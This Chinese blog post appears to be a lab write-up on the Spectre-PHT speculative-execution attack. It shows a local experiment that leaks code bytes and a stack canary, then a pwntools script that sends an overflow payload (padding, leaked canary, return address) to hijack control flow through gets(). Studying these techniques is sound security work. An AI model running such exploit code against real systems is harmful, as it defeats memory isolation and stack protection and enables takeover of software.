体系结构与内存安全(3)——利用Spectre-PHT推测执行泄漏内存数据
Spectre攻击的基本原理 分支预测器采用模式历史表(PHT)预测直接分支的跳转地址,Kocher等人发现可以重复训练分支预测器使其预测错误,在错误执行路径到恢复正确执行路径之间的暂态执行窗口中执行暂态指令窃取秘密数据,这一成果发表于2019年的信息安全四大顶级学术会议之一的IEEE Oakland(S&P)上。
利用这一漏洞,攻击者能够成功打破计算机的内核地址空间随机化机制(KASLR),破坏内存隔离机制从而窃取其他进程的秘密数据。
1 2 3 4 5 void victim_function (size_t x) { if (x < array1_size) { temp &= array2[array1[x] * 512 ]; } }
Spectre攻击的受害者示例代码如上所示。正常逻辑下,应先对变量x进行边界检查,根据检查结果选择正确的分支。但在实现了分支预测的现代处理器架构中,为了提高处理器的效率,在判断语句完成之前,处理器会继续处理最有可能的分支。这种先执行后判断的预测机制产生了边界检查绕过的安全漏洞:
第一步:攻击者反复传递合法的x来训练分支预测器的预测方向为true,同时清除缓存中的数据以防止例外的命中情况发生;
第二步:攻击者传递越界的x, 由于分支预测器仍然预测分支结果为true,从而触发受害者程序进入暂态执行。同时,在暂态执行期间受害者的代码会越界访问秘密数据,并且使得共享数组array2与秘密数据相关的数据进入缓存。
第三步:攻击者通过对数组进行遍历,测量每次的访问时间,出缓存命中的地址,从而推测出秘密数据。
实验环境与基本配置 系统和编译配置
CPU:Intel AlderLake i7-12700;
1 2 3 4 5 6 7 8 9 $ lscpu 架构: x86_64 CPU 运行模式: 32-bit, 64-bit Address sizes: 46 bits physical, 48 bits virtual 字节序: Little Endian CPU: 20 在线 CPU 列表: 0-19 厂商 ID: GenuineIntel 型号名称: 12th Gen Intel(R) Core(TM) i7-12700
操作系统:ArchLinux Rolling;
内核版本:Linux LTS 5.15.178,20250204;
1 2 $ uname -a Linux ARCH-IAMYWANG 5.15.178-1-lts515
1 2 3 4 5 6 7 8 9 $ gcc -v 使用内建 specs。 COLLECT_GCC=gcc COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-pc-linux-gnu/14.2.1/lto-wrapper 目标:x86_64-pc-linux-gnu 配置为:/build/gcc/src/gcc/configure --enable-languages=ada,c,c++,d,fortran,go,lto,m2,objc,obj-c++,rust --enable-bootstrap --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://gitlab.archlinux.org/archlinux/packaging/packages/gcc/-/issues --with-build-config=bootstrap-lto --with-linker-hash-style=gnu --with-system-zlib --enable-__cxa_atexit --enable-cet=auto --enable-checking=release --enable-clocale=gnu --enable-default-pie --enable-default-ssp --enable-gnu-indirect-function --enable-gnu-unique-object --enable-libstdcxx-backtrace --enable-link-serialization=1 --enable-linker-build-id --enable-lto --enable-multilib --enable-plugin --enable-shared --enable-threads=posix --disable-libssp --disable-libstdcxx-pch --disable-werror 线程模型:posix 支持的 LTO 压缩算法:zlib zstd gcc 版本 14.2.1 20250207 (GCC)
可执行程序配置
漏洞变体:Oakland’19,Spectre-PHT原始版本;
ASLR:已关闭(设置为0);
Canary栈保护:已开启;
PIE随机化:已开启(此时PIE仅带来类似KASLR的确定性地址偏移);
NX栈不可执行:已开启。
1 2 3 4 5 6 7 8 pwndbg> checksec File: a.out Arch: amd64 RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled Stripped: No
说明
正常情况下,读写某些特定内存区域的具体值不需要额外的权限;
但是,在程序执行过程中,或者说从ISA的角度(也就是反汇编得到的指令序列以及相应的内存访问的角度),程序无法显式访问比较敏感的内存区域;
我们利用Spectre-PHT攻击的目标就是读取这些敏感区域。
验证Spectre-PHT能够任意读取内存:指令区域 现有的研究工作中,研究人员通常将数据段的内存泄漏作为微架构安全漏洞攻击的演示案例。我们通过简单的实验证明指令区域同样可以任意泄漏。
步骤1:计算PIE偏移量 在开启PIE的情况下(由于系统ASLR设置为0,此时PIE仅带来类似KASLR的确定性地址偏移),计算程序代码中某个函数的地址:
1 2 printf ("Hijack function address:\n" );printf ("%zx\n" , (size_t )hijack);
输出结果为:
1 2 3 $ ./a.out Hijack function address: 5555555557da
利用objdump反编译得到的函数入口地址:
1 2 3 4 5 6 7 8 00000000000017da <hijack>: 17da: 55 push %rbp 17db: 48 89 e5 mov %rsp,%rbp 17de: 48 8d 05 cb 08 00 00 lea 0x8cb(%rip),%rax # 20b0 <_IO_stdin_used+0xb0> 17e5: 48 89 c7 mov %rax,%rdi 17e8: e8 53 f8 ff ff call 1040 <puts@plt> 17ed: bf 00 00 00 00 mov $0x0,%edi 17f2: e8 79 f8 ff ff call 1070 <exit@plt>
因此可以计算出PIE随机化的偏移量:
1 2 $ python cal.py 0x555555554000
步骤2:利用Spectre-PHT读取hijack函数的指令序列 读取过程仅需微调原始Spectre-PHT的代码,将地址修改为hijack函数的地址:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 $ ./a.out Reading at malicious_x = 0x5555555557da... Success: 0x55=’U’ score=15 (second best: 0xFF=’?’ score=5) Reading at malicious_x = 0x5555555557db... Success: 0x48=’H’ score=7 (second best: 0xFF=’?’ score=1) Reading at malicious_x = 0x5555555557dc... Success: 0x89=’?’ score=2 Reading at malicious_x = 0x5555555557dd... Success: 0xe5=’?’ score=2 Reading at malicious_x = 0x5555555557de... Success: 0x48=’H’ score=2 Reading at malicious_x = 0x5555555557df... Success: 0x8d=’?’ score=2 Reading at malicious_x = 0x5555555557e0... Success: 0x05=’?’ score=2 Reading at malicious_x = 0x5555555557e1... Success: 0xcb=’?’ score=2 Reading at malicious_x = 0x5555555557e2... Success: 0x08=’?’ score=2 Reading at malicious_x = 0x5555555557e3... Success: 0x00=’?’ score=2 Reading at malicious_x = 0x5555555557e4... Success: 0x00=’?’ score=2 Reading at malicious_x = 0x5555555557e5... Success: 0x48=’H’ score=2 Reading at malicious_x = 0x5555555557e6... Success: 0x89=’?’ score=2 Reading at malicious_x = 0x5555555557e7... Success: 0xc7=’?’ score=2 Reading at malicious_x = 0x5555555557e8... Success: 0xe8=’?’ score=2 Reading at malicious_x = 0x5555555557e9... Success: 0x53=’S’ score=2 Reading at malicious_x = 0x5555555557ea... Success: 0xf8=’?’ score=2 Reading at malicious_x = 0x5555555557eb... Success: 0xff=’?’ score=2 Reading at malicious_x = 0x5555555557ec... Success: 0xff=’?’ score=2 Reading at malicious_x = 0x5555555557ed... Success: 0xbf=’?’ score=2 Reading at malicious_x = 0x5555555557ee... Success: 0x00=’?’ score=2 Reading at malicious_x = 0x5555555557ef... Success: 0x00=’?’ score=2 Reading at malicious_x = 0x5555555557f0... Success: 0x00=’?’ score=2 Reading at malicious_x = 0x5555555557f1... Success: 0x00=’?’ score=2 Reading at malicious_x = 0x5555555557f2... Success: 0xe8=’?’ score=2 Reading at malicious_x = 0x5555555557f3... Success: 0x79=’y’ score=2 Reading at malicious_x = 0x5555555557f4... Success: 0xf8=’?’ score=2 Reading at malicious_x = 0x5555555557f5... Success: 0xff=’?’ score=2 Reading at malicious_x = 0x5555555557f6... Success: 0xff=’?’ score=2
读取结果为:55 48 89 e5 ...
通过对比Spectre-PHT的读取结果与objdump的反汇编结果,能够验证Spectre-PHT攻击可以有效泄漏指令区域的内存数据。
验证Spectre-PHT能够任意读取内存:栈保护 现有的研究工作中,仅有2022年发表于IEEE S&P上的SpecHammer攻击,通过结合Spectre-PHT推测执行漏洞与RowHammer比特翻转攻击,实现了栈保护canary的绕过。我们同样通过简单的实验证明,如果存在特定的gadget,仅仅依赖于Spectre-PHT攻击也可以达成此效果。
步骤1:计算Canary的地址 我们预先在main函数中准备了一个长度为16字节的buf变量,在关闭地址随机化的前提下,rbp的地址为buf+16+16,canary的地址为rbp-8,即rbp+32。因此,在本地攻击中我们将推测窃取的目标地址设置为buf+0x18:
1 2 3 4 5 int main () { char buf[16 ]; printf ("Reading stack canary with Spectre-PHT:\n" ); spec((size_t )buf + 0x18 , 8 );
步骤2:利用gdb调试获取真实的Canary 首先,在main函数处添加断点:
1 2 pwndbg> break main Breakpoint 1 at 0x17fb
其次,run并记录正确的canary值:
1 2 3 4 5 6 7 8 9 10 11 12 13 ────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────── ► 0x5555555557fb <main+4> sub rsp, 0x20 RSP => 0x7fffffffd8d0 (0x7fffffffd8f0 - 0x20) 0x5555555557ff <main+8> mov rax, qword ptr fs:[0x28] RAX, [0x7ffff7d9e768] => 0x31eec8dfc845f600 0x555555555808 <main+17> mov qword ptr [rbp - 8], rax [0x7fffffffd8e8] <= 0x31eec8dfc845f600 0x55555555580c <main+21> xor eax, eax EAX => 0 0x55555555580e <main+23> lea rax, [rip + 0x8d3] RAX => 0x5555555560e8 ◂— 'Reading stack canary with Spectre-PHT:' 0x555555555815 <main+30> mov rdi, rax RDI => 0x5555555560e8 ◂— 'Reading stack canary with Spectre-PHT:' 0x555555555818 <main+33> call puts@plt <puts@plt> 0x55555555581d <main+38> lea rax, [rbp - 0x20] 0x555555555821 <main+42> add rax, 0x18 0x555555555825 <main+46> mov esi, 8 ESI => 8 0x55555555582a <main+51> mov rdi, rax
此时正确canary为:0x31eec8dfc845f600。
步骤3:利用Spectre-PHT越权窃取Canary并对比 然后,继续执行Spectre-PHT攻击还原canary值:
1 2 3 4 5 6 7 8 9 Reading stack canary with Spectre-PHT: Reading at malicious_x = 0x7fffffffd8e8... Success: 0x00=’?’ score=9 (second best: 0xC4=’?’ score=2) Reading at malicious_x = 0x7fffffffd8e9... Success: 0xf6=’?’ score=7 (second best: 0xFF=’?’ score=1) Reading at malicious_x = 0x7fffffffd8ea... Success: 0x45=’E’ score=2 Reading at malicious_x = 0x7fffffffd8eb... Success: 0xc8=’?’ score=2 Reading at malicious_x = 0x7fffffffd8ec... Success: 0xdf=’?’ score=2 Reading at malicious_x = 0x7fffffffd8ed... Success: 0xc8=’?’ score=2 Reading at malicious_x = 0x7fffffffd8ee... Success: 0xee=’?’ score=2 Reading at malicious_x = 0x7fffffffd8ef... Success: 0x31=’1’ score=2
我们恢复的数据也是0x31eec8dfc845f600。
结合Spectre-PHT与栈溢出实现控制流劫持 步骤1:准备栈溢出的环境 在main函数中使用不安全的gets函数,这个缓冲区溢出漏洞使得buf的值过长时能覆盖栈上的canary值以及返回地址:
1 2 3 4 5 printf ("Enter something: " ); gets(buf); return 0 ; }
步骤2:准备payload 根据先前的分析,buf的长度为16字节,rbp的地址为buf+32,canary的地址为rbp-8,返回地址的地址为rbp+8,因此我们的payload应该按照如下顺序组成:
第一,24字节的‘A’用于覆盖buf的16字节以及canary与buf之间的8个字节
第二,8字节的canary绕过栈保护(要考虑大端小端,也可以直接p64);
第三,8字节的‘B’用于覆盖rbp;
第四,8字节的hijack覆盖返回地址(要考虑大端小端,也可以直接p64)。
1 2 3 4 5 6 7 8 9 10 11 payload = b'A' * 0x18 payload += p64(int (canary, 16 )) payload += b'B' * 8 payload += p64(int (hijack, 16 ))
在实际实验过程中,我们需要在线运行目标程序:
1 2 3 4 5 os.system('gcc -std=c99 -o main main.c' ) p = process('./main' )
同时利用Spectre-PHT获得canary的地址:
1 2 3 4 p.recvline().decode() canary = p.recvline().decode() print ("canary: " + canary)
1 2 printf ("Reading stack canary with Spectre-PHT:\n" );spec((size_t )buf + 0x18 , 8 );
最后组合payload传回正在运行的程序中实现控制流劫持:
1 2 3 4 5 6 7 8 print ("payload:" )print (hexdump(payload))p.sendline(payload) print (p.recvline().decode())
实验输出如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 $ python spec.py [+] Starting local process './main' : pid 58043 canary: 87d8f30d3e820100 hijack: 55555555573f payload: 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│ 00000010 41 41 41 41 41 41 41 41 00 01 82 3e 0d f3 d8 87 │AAAA│AAAA│···>│····│ 00000020 42 42 42 42 42 42 42 42 3f 57 55 55 55 55 00 00 │BBBB│BBBB│?WUU│UU··│ 00000030 [*] Process './main' stopped with exit code 0 (pid 58043) Enter something: Congratulations! You have hijacked the control flow!
参考文献 [1] Kocher, P., Horn, J., Fogh, A., Genkin, D., Gruss, D., Haas, W., … & Yarom, Y. (2019, May). Spectre Attacks: Exploiting Speculative Execution. In 2019 IEEE Symposium on Security and Privacy (SP) (pp. 1-19). IEEE Computer Society.
[2] Tobah, Y., Kwong, A., Kang, I., Genkin, D., & Shin, K. G. (2022, May). Spechammer: Combining spectre and rowhammer for new speculative attacks. In 2022 IEEE Symposium on Security and Privacy (SP) (pp. 681-698). IEEE.
[3] https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stackoverflow-basic/
[4] https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/
